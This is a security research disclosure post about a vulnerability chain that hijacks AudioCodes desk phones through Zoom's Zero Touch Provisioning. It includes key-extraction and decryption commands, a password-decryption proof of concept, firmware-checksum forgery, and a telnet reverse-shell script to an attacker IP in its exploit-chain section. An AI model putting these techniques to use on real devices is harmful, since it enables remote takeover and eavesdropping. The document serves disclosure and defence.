
Zero Touch Pwn: Abusing Zoom's Zero Touch Provisioning for Remote Attacks on Desk Phones

In this blog post, we describe several vulnerabilities that were discovered during a security analysis of AudioCodes desk phones and Zoom’s Zero Touch Provisioning. We also discuss and demonstrate the potential attack scenarios that could arise from these vulnerabilities.

UPDATE (2023-08-18)

UPDATE: The vendor informed us on August 17th, 2023, that the critical vulnerabilities described in this blog post, except for SYSS-2022-055, have been fixed and that the attacks are no longer possible. An updated post will follow soon.

TL;DR

An external attacker who leverages the vulnerabilities discovered in AudioCodes Ltd.’s desk phones and Zoom’s Zero Touch Provisioning feature can gain full remote control of the devices. This could allow the attacker, for example, to:

  • eavesdrop on rooms or phone calls
  • pivot through the devices and attack corporate networks
  • build a botnet of compromised devices

In addition, we were able to analyze and reconstruct cryptographic routines of AudioCodes devices, and to decrypt sensitive information such as passwords and configuration files. Due to improper authentication, a remote attacker is able to access such files and data.

This research was presented at BlackHat USA 2023.

Introduction

In practice, automatic provisioning procedures are widely used for the configuration of new VoIP devices. These procedures ensure that the devices receive all necessary information for operation, such as server addresses, account information, and firmware updates. Furthermore, these procedures allow for efficient central management of the devices after initial provisioning, enabling organizations to easily monitor, troubleshoot and update the devices as needed.

In conventional on-premise VoIP installations, a simple web server is usually deployed within the local network to provide configurations and firmware updates to the devices.

In our experience from penetration testing, the provisioning of devices often poses significant security risks. The chicken-and-egg problem, in which a device needs to query the necessary files with factory settings without any additional information or credentials, can make it challenging to secure the provisioning process. Additionally, the files must be protected against unauthorized access, which can be difficult to achieve.

However, traditional installations typically locate devices and provisioning services in separate and secure network areas, which limits the attack surface and thus the group of potential attackers. But with the rise of cloud communication providers such as Zoom, the situation has changed significantly. These providers have become a fundamental part of daily work life and are gradually replacing traditional VoIP installations.

In certain scenarios, however, a softclient is not enough, and hardware such as desk phones or analog gateways is still needed. Such devices can therefore be integrated with most major cloud communication providers today.

But how secure is it to combine traditional devices, with admittedly often improvable security levels, with state-of-the-art cloud-based communication services? In this article, we are going to examine this question based on the example of the Zoom Meeting Platform and AudioCodes devices.

Zoom’s Zero Touch Provisioning

Zoom supports the automatic provisioning of certified hardware, a feature called “Zero Touch Provisioning” (ZTP). This allows an IT administrator to assign a device to a user and define configurations, which are then retrieved by the device while it is in its factory settings. This is a very convenient method with a plug-and-play approach.

Based on the wide range of devices supported for ZTP and the number of seats, Zoom seems to be one of the more relevant providers for integrating traditional devices and is therefore a good choice for our security analysis:

[Figure: Amount of phone seats in Zoom]

How it works

Based on our analysis, Zoom’s ZTP works in the following manner:

  1. A new device can be added inside the Zoom Phone admin panel and a configuration template is assigned
  2. The corresponding vendor redirect service is triggered and informed that the device is now assigned to Zoom
  3. A device in its factory settings requests the device configuration from the vendor’s redirect service
  4. The redirect service redirects to Zoom’s ZTP service
  5. The desk phone requests the device configuration from Zoom’s ZTP service
  6. ZTP responds with the assigned configuration template

This mechanism can be illustrated as follows:

[Figure: Illustration of Zoom ZTP]
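The six steps above can also be sketched as a small toy model. This is not Zoom's or AudioCodes' implementation; the class names, the method names, and the URL `https://ztp.example.invalid` are all hypothetical and only illustrate the order of the lookups.

```python
from typing import Dict, Optional


class RedirectService:
    """Toy stand-in for the vendor's redirect service (steps 2 to 4)."""

    def __init__(self) -> None:
        self._targets: Dict[str, str] = {}

    def register(self, mac: str, provisioning_url: str) -> None:
        # Step 2: the redirect service learns where this MAC should be sent.
        self._targets[mac] = provisioning_url

    def lookup(self, mac: str) -> Optional[str]:
        # Steps 3 and 4: a factory-reset device asks where to provision from.
        return self._targets.get(mac)


class ZtpService:
    """Toy stand-in for the second-stage provisioning service (steps 1, 5, 6)."""

    def __init__(self, base_url: str, redirect: RedirectService) -> None:
        self.base_url = base_url
        self._redirect = redirect
        self._templates: Dict[str, str] = {}

    def add_device(self, mac: str, template: str) -> None:
        # Step 1: the admin adds the device and assigns a template.
        self._templates[mac] = template
        self._redirect.register(mac, self.base_url)

    def get_config(self, mac: str) -> Optional[str]:
        # Steps 5 and 6: the device fetches its assigned configuration.
        return self._templates.get(mac)


def factory_boot(mac: str, redirect: RedirectService,
                 services: Dict[str, ZtpService]) -> Optional[str]:
    """Simulate a device in factory settings walking through both stages."""
    url = redirect.lookup(mac)
    if url is None:
        return None  # device is not assigned to any provider
    return services[url].get_config(mac)


redirect = RedirectService()
ztp = ZtpService("https://ztp.example.invalid", redirect)  # hypothetical URL
ztp.add_device("00908F9D8992", "system/type=C450HD")
print(factory_boot("00908F9D8992", redirect, {ztp.base_url: ztp}))
```

The model makes one property visible that matters later in the post: the device itself contributes nothing but its MAC address to the first lookup.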

Device Authentication

As previously outlined, an assigned phone retrieves its configuration from the Zero Touch Provisioning (ZTP) service at a specific point in time during its initialization process. To examine the communication between the device and ZTP, we initiated several machine-in-the-middle attacks utilizing a Transport Layer Security (TLS) proxy. Through this process, we discovered that certificate-based authentication (also known as mutual TLS) is required and enforced by Zoom:

[Figure: Mutual TLS authentication]

Additionally, we obtained the base URL of the ZTP service from the documentation. As expected, however, a client certificate is mandatory:

$ curl -v https://provpp.zoom.us/api/v2/pbx/provisioning/audiocodes

[...]
HTTP/2 400
server: nginx
date: Thu, 12 Jan 2023 10:04:25 GMT
content-type: text/html
content-length: 230
strict-transport-security: max-age=31536000; includeSubDomains

<html>
<head><title>400 No required SSL certificate was sent</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>No required SSL certificate was sent</center>
<hr><center>nginx</center>
</body>
</html>

As the next step, we extracted a valid client certificate from a supported device (see device analysis). After configuring the TLS proxy accordingly, we were able to successfully intercept and examine the network communication.

Here is an example request for a device configuration:

GET /api/v2/pbx/provisioning/audiocodes/00908F9D8992.cfg HTTP/2
Host: eu01pbxacp.zoom.us
User-Agent: AUDC/3.4.6.604 AUDC-IPPhone-C450HD_UC_3.4.6.604/1

Response from ZTP:

HTTP/2 200 OK
Date: Thu, 12 Jan 2023 11:53:09 GMT
Content-Type: application/octet-stream
Content-Length: 6603
X-Zm-Trackingid: PBX_XXXXXXXXXXXXXXXXXXXXXXXXXXX
X-Zm-Region: XX
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Frame-Options: deny
Content-Disposition: attachment; filename=00908F9D8992.cfg
Accept-Ranges: bytes
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff

system/type=C450HD
voip/dns_cache_srv/0/name=_sips._tcp.XXXXXXXXX.XX.zoom.us
voip/dns_cache_srv/0/port=5091
voip/dns_cache_srv/0/priority=1
[...]

Besides the client certificate, the value of the User-Agent header is also verified:

Request:

GET /api/v2/pbx/provisioning/audiocodes/00908F9D8992.cfg HTTP/2
Host: eu01pbxacp.zoom.us
User-Agent: SySS

Response:

HTTP/2 404 Not Found
Content-Length: 0
[...]

Furthermore, depending on the vendor and the device model, the client certificate must have a matching Common Name (CN) attribute or serial number, which corresponds to the MAC address of the device, to retrieve the correct configuration file.

This certificate-based authentication, which verifies the exact match of the MAC address with the requested configuration, makes it difficult for an attacker to access device configurations without possessing the corresponding device certificate.
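The checks observed so far can be summarized in a short sketch. It models only the behavior seen from the outside and is not Zoom's server code. The `AUDC/` prefix rule for the User-Agent and the `"denied"` result for a MAC mismatch are assumptions, since the post states neither the exact User-Agent validation nor the status code returned for a mismatching certificate.

```python
import re
from typing import Optional

# Path layout taken from the example request; the MAC is the file name.
CFG_PATH = re.compile(
    r"^/api/v2/pbx/provisioning/audiocodes/([0-9A-Fa-f]{12})\.cfg$"
)


def normalize_mac(value: str) -> str:
    """Strip separators such as ':' or '-' and upper-case the hex digits."""
    return re.sub(r"[^0-9A-Fa-f]", "", value).upper()


def check_request(cert_cn: Optional[str], user_agent: str, path: str) -> str:
    """Return the modeled outcome for one provisioning request."""
    if cert_cn is None:
        return "400"  # observed: "No required SSL certificate was sent"
    if not user_agent.startswith("AUDC/"):  # assumption: prefix check
        return "404"  # observed for the User-Agent value "SySS"
    match = CFG_PATH.match(path)
    if match is None:
        return "404"  # assumption: unknown paths are treated as not found
    if normalize_mac(cert_cn) != match.group(1).upper():
        return "denied"  # exact status code is not stated in the post
    return "200"


path = "/api/v2/pbx/provisioning/audiocodes/00908F9D8992.cfg"
agent = "AUDC/3.4.6.604 AUDC-IPPhone-C450HD_UC_3.4.6.604/1"
print(check_request("00908F9D8992", agent, path))
```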

Device Assignment

Assigning devices can be accomplished in the Zoom Phone’s administrative panel by adding the MAC addresses of the devices:

[Figure: Assignment of a desk phone]

However, there is no other client-side verification, such as a one-time password or other evidence that the MAC address actually belongs to the organization.

Therefore, an attacker with access to the necessary licenses for using Zoom Phone can claim arbitrary MAC addresses and assign a self-defined configuration template.

Since configuration templates include device settings and instructions, an attacker could potentially trigger actions such as downloading malicious firmware from a server under their control:

[Figure: Self-defined configuration template]

[Figure: Self-defined configuration template provided to assigned phones]

As a result, every time the assigned device is in its factory settings state, such as when it is a new phone or has been reset, it will request the malicious configuration file from ZTP and subsequently download the firmware image provided by the attacker.

An attacker could also leverage another built-in function of Zoom’s ZTP to amplify the scope of this attack by importing a massive list of MAC addresses:

[Figure: Import of arbitrary devices]

After importing this list of MAC addresses, the devices belong to the attacker’s Zoom account. A new or subsequent assignment, e.g. by the legitimate owner of the device, has no effect on the attacker’s assignment, and the redirection is not overwritten.

During the security analysis, we did not identify any limitations on the number of devices that can be added.
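The assignment behavior described above can be modeled in a few lines. This is a toy model of the observed behavior, not Zoom's implementation; `ClaimRegistry` and the account names are hypothetical.

```python
from typing import Dict, Iterable, Optional


class ClaimRegistry:
    """Toy model: the first account to claim a MAC address keeps it."""

    def __init__(self) -> None:
        self._owner: Dict[str, str] = {}

    def claim(self, mac: str, account: str) -> bool:
        """Record a claim; return True only if the claim took effect."""
        # No proof of ownership is requested, only the MAC address itself.
        if mac in self._owner:
            return False  # a later assignment does not overwrite the first
        self._owner[mac] = account
        return True

    def bulk_import(self, macs: Iterable[str], account: str) -> int:
        """Claim many MAC addresses; return how many claims took effect."""
        return sum(self.claim(mac, account) for mac in macs)

    def owner(self, mac: str) -> Optional[str]:
        return self._owner.get(mac)


registry = ClaimRegistry()
registry.bulk_import(["00908F9D8992", "00908F9D8993"], "attacker-account")
took_effect = registry.claim("00908F9D8992", "legitimate-owner")
print(took_effect, registry.owner("00908F9D8992"))
```

In this model, the only input to `claim` is a value that is printed on the device and predictable from the vendor prefix, which is the core of the unverified ownership issue.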

With the knowledge of this unverified ownership vulnerability, described in SYSS-2022-056, the idea was to find vulnerabilities in the firmware signature verification of supported devices and abuse Zoom’s ZTP to trigger arbitrary devices into installing malicious firmware.

Analysis of Certified Hardware

This section covers the analysis of an AudioCodes C450HD VoIP desk phone, which is listed as a supported device for ZTP.

AudioCodes Redirect Service

Before delving into our planned attack scenario, we further analyze the device provisioning process with regard to the vendor’s redirect service.

As previously explained, a desk phone in its factory settings will initially request a configuration or the provisioning server URL from the corresponding vendor server. This is also the case for AudioCodes devices, which contact the AudioCodes redirect server at redirect.audiocodes.com. This initial provisioning stage is similar to the later stages of provisioning and device configuration with Zoom’s ZTP.

However, unlike Zoom, there is no authentication required to access and query redirect URLs and configurations. In many cases, only the URL of the second-stage provisioning server can be accessed:

[Figure: Provisioning URL received from vendor’s redirect server]

However, during our security analysis, we performed some spot checks and found credentials embedded in redirect URLs:

[Figure: Credentials in redirection URLs]

In the spot checks, we also followed redirections that pointed to paths on the AudioCodes redirect server itself, where we found sensitive information such as configuration files including passwords:

[Figure: Sensitive information in redirect server]

Sensitive data on third-party servers can also be identified during the redirection process.

Therefore, we strongly urge operators of these services and users of the AudioCodes redirect server to check whether this data is freely accessible. In general, we recommend enforcing authentication and avoiding the storage of sensitive information such as passwords in plain text.

Due to the device assignment based on the MAC address, it is possible for an attacker to scan the entire AudioCodes MAC address space, greatly increasing the potential impact of this issue.
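To give a sense of scale, the following sketch counts the addresses behind a single 24-bit vendor prefix (OUI). The prefix `00:90:8F` is taken from the example MAC address shown earlier in this post; whether it is the only prefix used by AudioCodes devices is an assumption not covered here.

```python
from itertools import islice
from typing import Iterator


def address_count(suffix_bits: int = 24) -> int:
    """Number of MAC addresses that share one 24-bit vendor prefix."""
    return 2 ** suffix_bits


def macs_for_oui(oui: str) -> Iterator[str]:
    """Lazily yield every MAC address (12 hex digits) under one OUI."""
    prefix = oui.replace(":", "").replace("-", "").upper()
    if len(prefix) != 6:
        raise ValueError("an OUI consists of exactly 6 hex digits")
    int(prefix, 16)  # raises ValueError if the prefix is not hexadecimal
    for suffix in range(address_count()):
        yield f"{prefix}{suffix:06X}"


first_three = list(islice(macs_for_oui("00:90:8F"), 3))
print(first_three)
print(address_count())
```

A space of this size is small enough to be enumerated completely, which is why an unauthenticated lookup keyed only by MAC address exposes every registered device.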

This exposure of sensitive information to an unauthorized actor is described in SYSS-2022-053.

Password Encryption

During the spot checks on accessing configuration files via the AudioCodes redirect service, we also found Base64-encoded strings which seem to be encrypted passwords:

[Figure: Base64-encoded and encrypted password]

$ echo "VvlZOp5/5pM=" | base64 -d | xxd

00000000: 56f9 593a 9e7f e693                      V.Y:....
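The same decoding step in Python, with a quick length check. That the decoded value is exactly 8 bytes long is consistent with a single block of a 64-bit block cipher such as DES or Triple DES, but this is only a heuristic and not proof of the algorithm.

```python
import base64

BLOCK_SIZE = 8  # block size of DES and Triple DES in bytes

blob = base64.b64decode("VvlZOp5/5pM=")

print(blob.hex())                    # 56f9593a9e7fe693
print(len(blob))                     # 8
print(len(blob) % BLOCK_SIZE == 0)   # True
```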

As a next step, we analyzed the firmware to recover the encryption routine in use.

The firmware of AudioCodes devices can be downloaded from the vendor’s download portal and is not itself encrypted. Another way to access the device file system is to log in as root via SSH, which is permitted with the administrator password.

During this analysis, we found out that many functionalities are defined in the shared object file /lib/libaq201.so. This library also imports the function decrypt_string from the shared object file /lib/libac_des3.so, which therefore seems to be a good indicator for the encryption routine.

By disassembling and decompiling this library with tools like Ghidra, the encryption algorithm can be reversed and the hardcoded encryption key extracted.

After some operations, e.g. on the encrypted string, the exported function decrypt_string calls the function des3_crypt:

[Figure: Calling an encryption function]

Within the function des3_crypt, a call is made to the functions DES_set_key_unchecked and DES_ede3_cbc_encrypt, which are imported from /lib/libcrypto.so.1.0.0:

[Figure: 3DES functions]

These OpenSSL functions first convert the key into the architecture-dependent key schedule and then perform the actual Triple DES decryption.

By knowing the calling convention, we can redefine the given parameters:

[Figure: Redefining parameters and variables]

Afterwards, the pointers to the 8-byte initialization vector (IV) and the 24-byte cryptographic key can be examined, which reveals their memory locations inside the binary:

[Figure: Triple DES initialization vector]

[Figure: Triple DES key]

# Extraction of the key:
$ offset=$(python3 -c 'print(int("00000fb8", base=16))')
$ dd skip=$offset count=24 if=libac_des3.so of=key.bin bs=1

# Extraction of the IV:
$ offset=$(python3 -c 'print(int("00000fb0", base=16))')
$ dd skip=$offset count=8 if=libac_des3.so of=iv.bin bs=1
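The two dd invocations can also be expressed as a small Python helper. The offsets are the ones shown above; the helper name `extract_bytes` is our own. Note that the IV offset plus 8 bytes equals the key offset, so in this binary the IV is stored directly in front of the key.

```python
def extract_bytes(path: str, offset: int, count: int) -> bytes:
    """Read exactly `count` bytes starting at `offset` (like dd with bs=1)."""
    with open(path, "rb") as handle:
        handle.seek(offset)
        data = handle.read(count)
    if len(data) != count:
        raise ValueError("file is too short for the requested range")
    return data


IV_OFFSET = int("00000fb0", 16)   # 4016
KEY_OFFSET = int("00000fb8", 16)  # 4024
IV_LENGTH = 8
KEY_LENGTH = 24

# The 8-byte IV ends exactly where the 24-byte key begins.
print(IV_OFFSET + IV_LENGTH == KEY_OFFSET)  # True
```

With the library at hand, `extract_bytes("libac_des3.so", KEY_OFFSET, KEY_LENGTH)` would return the same bytes that dd writes to key.bin.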

Finally, encrypted passwords of AudioCodes devices can be decrypted, for instance by using a simple Python script:

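#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Decrypt a Base64-encoded AudioCodes password (requires PyCryptodome)."""

import sys
import base64
from Crypto.Cipher import DES3
from binascii import unhexlify

# Hardcoded 24-byte key and 8-byte IV extracted from libac_des3.so.
# The values are redacted here ('#') and must be filled in before running.
KEY = unhexlify('604075fb########################################')
IV  = unhexlify('a3a4####35cb####')


def decrypt(ciphertext):
    # Base64-decode the value, then decrypt it with Triple DES in CBC mode.
    ciphertext_decoded = base64.b64decode(ciphertext)
    cipher = DES3.new(KEY, DES3.MODE_CBC, iv=IV)
    plaintext = cipher.decrypt(ciphertext_decoded)
    print("plain text password: {}".format(plaintext.decode('utf-8')))


def main():
    if len(sys.argv) != 2:
        sys.exit("usage: poc.py <base64-encoded password>")
    decrypt(sys.argv[1])


if __name__ == '__main__':
    main()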
$ python3 poc.py VvlZOp5/5pM=

plain text password: system

This use of a hardcoded cryptographic key is described in SYSS-2022-052 (CVE-2023-22957).

Configuration File Encryption

Next we noticed that configuration files for AudioCodes devices could also be stored entirely encrypted:

[Figure: AudioCodes documentation for configuration file encryption]

However, a different encryption key is used for the configuration file encryption. Since we do not have the referenced tool encryption_tool.exe, we had to dig further into the device firmware.

During this analysis, we found that the shared object file /lib/libcgi.so checks whether a configuration file is encrypted and, if so, executes the following command:

/home/ipphone/bin/decryption_tool -f /tmp/back_file.cfx -o %s > /dev/null

So we assumed that the decryption of the configuration files is handled by /home/ipphone/bin/decryption_tool and therefore decided to have a closer look at this executable.

In doing so, we found that the imported OpenSSL function EVP_des_ede3_cbc is used as the cipher and that EVP_BytesToKey is used to derive the key and IV from a given string.

We found an interesting looking string, which is referenced in the function at memory location 00011620:

[Figure: String for key derivation pushed on the stack]

The instructions above result in a call to memcpy(r0, r1, r2), which can be abstracted as follows:

memcpy(location_on_the_stack, interesting_string, size_of_the_string)

Later in this function, the stack variable which holds the string is copied into register r3, which is then passed as fourth parameter to the function located at memory location 000111a0:

[Figure: Passing of the string to the function at memory location 000111a0]

Following this function, the string is again stored on the stack (r7):

[Figure: Storing the string on the stack]

Later in the function, r7 is stored in the fourth parameter which is passed to the OpenSSL function EVP_BytesToKey:

[Figure: Passing the string to the key derivation function]

According to the OpenSSL documentation of this function, this value is indeed the string from which the key is derived.

So we can extract the secret value from the memory location identified in the previous function at 00011620:

[Figure: Memory location of the secret for the key derivation]

$ offset=$(python3 -c 'print(int("00001e8f", base=16))')
$ dd skip=$offset count=64 if=decryption_tool of=secret.bin bs=1

Finally, the key is derivable from the extracted secret and encrypted AudioCodes configuration files can successfully be decrypted:

$ secret=$(cat secret.bin)

$ openssl enc -des-ede3-cbc -P -pass "pass:$secret" -nosalt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
key=40DA61##########################################
iv =C614############

$ openssl enc -d -des-ede3-cbc -pass "pass:$secret" -nosalt \
        -in encrypted_config.cfx -out plain_config.cfg

$ cat plain_config.cfg
voip/line/0/enabled=1
voip/line/0/id=123
voip/line/0/auth_name=XYZ
voip/line/0/auth_password=XYZ
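For readers who want to see what the key derivation does, here is a minimal Python sketch of the EVP_BytesToKey construction using only hashlib. The digest is left as an explicit parameter because the post does not state which one decryption_tool passes; `openssl enc` itself defaults to MD5 before OpenSSL 1.1.0 and to SHA-256 from 1.1.0 on. The password `b"password"` in the example is a placeholder, not the extracted secret.

```python
import hashlib
from typing import Tuple


def evp_bytes_to_key(password: bytes, key_len: int, iv_len: int,
                     digest: str, salt: bytes = b"",
                     count: int = 1) -> Tuple[bytes, bytes]:
    """Derive (key, iv) the way OpenSSL's EVP_BytesToKey does.

    Each round hashes the previous block, the password and the salt,
    then re-hashes the result (count - 1) more times. Blocks are
    concatenated until enough bytes for key and IV are available.
    """
    derived = b""
    block = b""
    while len(derived) < key_len + iv_len:
        block = hashlib.new(digest, block + password + salt).digest()
        for _ in range(count - 1):
            block = hashlib.new(digest, block).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


# Triple DES needs a 24-byte key and an 8-byte IV; no salt, as with -nosalt.
key, iv = evp_bytes_to_key(b"password", 24, 8, digest="md5")
print(len(key), len(iv))
```

Because no salt and no secret other than the embedded string enter the derivation, every device derives the same key and IV, which is why extracting the string once is sufficient.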

This second use of a hardcoded cryptographic key is described in SYSS-2022-054 (CVE-2023-22956).

Reversing of the Firmware Image Verification

To construct a successful exploit chain that delivers malicious firmware via Zoom’s ZTP and triggers arbitrary devices to install it, we must analyze the firmware update mechanism of AudioCodes devices.

As a first step, we modified a few bits within a firmware image file, which can be downloaded from the vendor’s download portal, and attempted to install it through the device’s web interface.

Unfortunately, the device rejected this attempt:

[Figure: Failed firmware update]

As there seems to be some kind of firmware verification, the corresponding update mechanism has to be analyzed:

The bash script /home/ipphone/scripts/run_ramfs_for_upgrade.sh handles the firmware update process, checks whether the executable /tmp/flasher_ext exists, and executes it. If this file does not exist, flasher located at /bin is executed:

[...]
FLASHER=flasher
[...]
do_upgrade() {
    v "Performing system upgrade..."
    ln -s /home/ipphone/bin/lcdbar /bin/lcdbar
    flasher u /tmp upgrade.img
    if [ $? -eq 0 ]; then
        v "external flasher exist"
        chmod +x /tmp/flasher_ext
        /tmp/flasher_ext u
        if [ $? -eq 0 ]; then
            v "external flasher can run, so use external flasher to upgrade"
            FLASHER="/tmp/flasher_ext"
        fi
    fi
    $FLASHER r /tmp upgrade.img 1>$CONSOLE 2>&1
    if [ $? -eq 0 ]; then
        v "Upgrade successful"
    else
        v "Upgrade fail"
    fi
}
[...]

Analyzing the flasher executable reveals extensive use of lseek. This C function changes the file offset for reading and writing specific parts of the firmware image file, which indicates that the image contains different sections.

By looking at the firmware image in a hex editor and further analyzing the binary, we were able to reconstruct the firmware structure and the header, which divides the file into several sections and also holds a simple checksum of each section:

[Figure: Firmware structure]

The checksum is calculated by summing up all bytes in the section starting from offset 0x60.
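A byte-sum checksum of this kind can be sketched as follows. The 32-bit width of the result and the interpretation of 0x60 as an offset relative to the start of the section are assumptions; the post states neither explicitly.

```python
CHECKSUM_START = 0x60  # offset from which bytes are summed (from the post)


def section_checksum(section: bytes, start: int = CHECKSUM_START,
                     width_bits: int = 32) -> int:
    """Sum all bytes from `start` onwards, truncated to `width_bits` bits.

    The truncation width is an assumption made for this sketch.
    """
    return sum(section[start:]) & ((1 << width_bits) - 1)


header = bytes(CHECKSUM_START)          # placeholder for the first 0x60 bytes
original = header + b"\x01\x02\x03"
reordered = header + b"\x03\x02\x01"    # same bytes in a different order
modified = header + b"\x01\x02\x07"     # one byte changed

print(section_checksum(original))   # 6
print(section_checksum(reordered))  # 6
print(section_checksum(modified))   # 10
```

The example shows two weaknesses of such a sum: reordering bytes does not change it at all, and after any other modification anyone can simply recompute it, since no secret or signature is involved.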

The analyzed firmware image consists of the following sections:

  1. Firmware header containing meta information (version, model, date, etc.)
  2. bootloader.img
  3. rootfs.ext4
  4. phone.img
  5. section.map
  6. flasher
  7. release
  8. end.section

After reconstructing the firmware image structure and the checksum calculation, we again flipped some bits inside the image file, recalculated the checksum, and tried to install it on the device. As expected, this time the firmware update was not aborted and we were able to install the manipulated image file.

To demonstrate this in a more convenient way, we extracted the rootfs.ext4 file system from the image file, mounted it, and created a new file:

[Figure: Firmware modification]

After packing the firmware and recalculating the checksum, we were able to install this manipulated firmware image, too:

[Figure: Updated checksum of the rootfs.ext4 section]

[Figure: Successfully installed manipulated firmware image]

This missing immutable root of trust in hardware is described in SYSS-2022-055 (CVE-2023-22955).

Exploit Chain

Now let’s move on to the exciting part where we take advantage of the unverified ownership and the missing immutable root of trust to develop an exploit chain.

As a simple proof of concept, we added the following script to the path /home/ipphone/scripts, which uses built-in tools (living off the land) to initiate a reverse shell to the attacker server:

#!/bin/sh

/bin/sleep 120
TF=$(/bin/mktemp -u)
/usr/bin/mkfifo $TF
/usr/bin/telnet <ATTACKER-IP> 5000 0<$TF | /bin/sh 1>$TF

The script path is then added to /home/ipphone/rcS which executes it at system start-up.

The manipulated firmware image is then stored on an attacker-controlled server and provided via HTTP. To trigger the target device to download the malicious firmware image, the attacker adds the device’s MAC address to their Zoom account and assigns an evil configuration template that includes instructions to download a new firmware from the attacker-controlled server (see device assignment).

Now, when the device is reset to factory settings, it goes through the provisioning process of both AudioCodes and Zoom, and then downloads and installs the malicious firmware image from the attacker’s server.

Finally, a reverse shell with root privileges pops up on the attacker server:

[Figure: Reverse shell from the targeted device]

This exploitation chain can be illustrated as follows:

[Figure: Complete attack chain]

To provide a more comprehensive proof of concept, we have added additional modifications, for example for eavesdropping:

[Figure: Eavesdropping attack]

Conclusion

During our security analysis, we identified multiple vulnerabilities in Zoom’s and AudioCodes’ provisioning concept as well as in certified hardware.

When combined, these vulnerabilities can be used to remotely take over arbitrary devices. As this attack is highly scalable, it poses a significant security risk:

[Figure: Attack scenarios]

We have demonstrated that combining advanced cloud-based communication solutions like Zoom with traditional technologies like VoIP devices can create a desirable target for attackers.

As future work, other cloud-based solutions and certified hardware could be analyzed for similar security vulnerabilities.

Vulnerability Summary

We initially reported all described vulnerabilities to the vendors in November 2022. Unfortunately, not all vulnerabilities were fixed at the time of the disclosure.

Details about the vulnerabilities and their solution state are provided in the following security advisories:

| Product | Vulnerability Type | SySS ID | CVE ID |
| --- | --- | --- | --- |
| AudioCodes IP-Phones (UC) | Use of Hard-coded Cryptographic Key (CWE-321) | SYSS-2022-052 | CVE-2023-22957 |
| AudioCodes Provisioning Service | Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) | SYSS-2022-053 | N.A. |
| AudioCodes IP-Phones (UC) | Use of Hard-coded Cryptographic Key (CWE-321) | SYSS-2022-054 | CVE-2023-22956 |
| AudioCodes IP-Phones (UC) | Missing Immutable Root of Trust in Hardware (CWE-1326) | SYSS-2022-055 | CVE-2023-22955 |
| Zoom Phone System Management | Unverified Ownership (CWE-283) | SYSS-2022-056 | N.A. |

This post is licensed under CC BY 4.0 by the author.